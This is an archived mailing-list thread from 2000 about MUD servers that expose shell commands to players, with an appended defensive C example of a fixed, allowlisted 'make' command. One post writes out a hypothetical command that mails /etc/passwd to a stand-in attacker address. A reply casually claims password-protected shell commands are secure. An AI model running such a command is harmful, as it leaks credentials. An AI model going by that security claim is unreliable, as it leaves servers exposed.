---- Begin Original Message ----
From: The Merciless Lord of Everything <serces@mud.dk>
Sent: Fri, 8 Sep 2000 12:25:30 +0200
To: CIRCLE@post.queensu.ca
Subject: Re: [CIRCLE] Ports

-snip-

While I'm on the ranting side :), a mud should imho not be able to grab onto system files. I've seen muds offer "ps -axu" and return the information to the user, even muds that offer the ability to execute arbitrary commands on the server.

Imagine the following in conjunction with a mud that runs as root (and offers the above arbitrary)

Mr. Evilguy hacks the admin's passwords (grabs it or however Evilguys get it :), and does a "execute pwunconv && mail evilguy@foo.bar < /etc/passwd && pwconv"

Voila.. mr evilguy now has a complete listing of usernames and passwords.

-snip-

/S

Sir Alec Guinness - May the force be with you, Always!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Hrmm, I beg to differ with you here. I installed pgrun.c written by Petr Vilim and have found it very useful. After contacting Petr, I installed a "make" command that allows me to compile the MUD without having to enter the shell. When you edit the source via save-to-ftp, you find this more than a bit handy.

Security is not that hard, as long as you protect each command with a final argument that contains a password. Of course, you want to check the player's idnum first.

If a hacker is out to get you, there isn't much you can do. I refuse to stay huddled up in a corner, cowering in fright while life passes me by.

-FIRE
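
As an added illustration of the trade-off discussed in this thread (not code from either poster, and not pgrun.c): one way to offer an in-game "make" command without giving players a shell is to map the command name onto a fixed argument vector, check the player's idnum, and refuse to run while the server is root. The idnum list, the path to make and the ../src directory are assumptions.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed values: the implementor idnum and the build command are hypothetical. */
static const long allowed_idnums[] = { 1 };
static const char *const make_argv[] = { "/usr/bin/make", "-C", "../src", NULL };

struct fixed_cmd { const char *name; const char *const *argv; };
static const struct fixed_cmd commands[] = { { "make", make_argv } };

/* Exact-match lookup: player text selects an entry, it never becomes a command line. */
const char *const *lookup_command(const char *name)
{
    for (size_t i = 0; i < sizeof commands / sizeof commands[0]; i++)
        if (strcmp(name, commands[i].name) == 0)
            return commands[i].argv;
    return NULL;
}

/* Refuse when the server runs as root, or when the player's idnum is not listed. */
int may_run(long idnum, uid_t euid)
{
    if (euid == 0)
        return 0;
    for (size_t i = 0; i < sizeof allowed_idnums / sizeof allowed_idnums[0]; i++)
        if (allowed_idnums[i] == idnum)
            return 1;
    return 0;
}

/* Returns the child's exit status (127 if exec failed), or -1 if refused. */
int run_fixed(const char *name, long idnum)
{
    const char *const *argv = lookup_command(name);
    int status;
    pid_t pid;

    if (argv == NULL || !may_run(idnum, geteuid()))
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);   /* no shell, fixed argv */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Because the player's input is only compared against the table, text such as "ps -axu" is rejected rather than passed to a shell, and a server started as root declines every request.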
This archive was generated by hypermail 2b30 : 04/11/01 PDT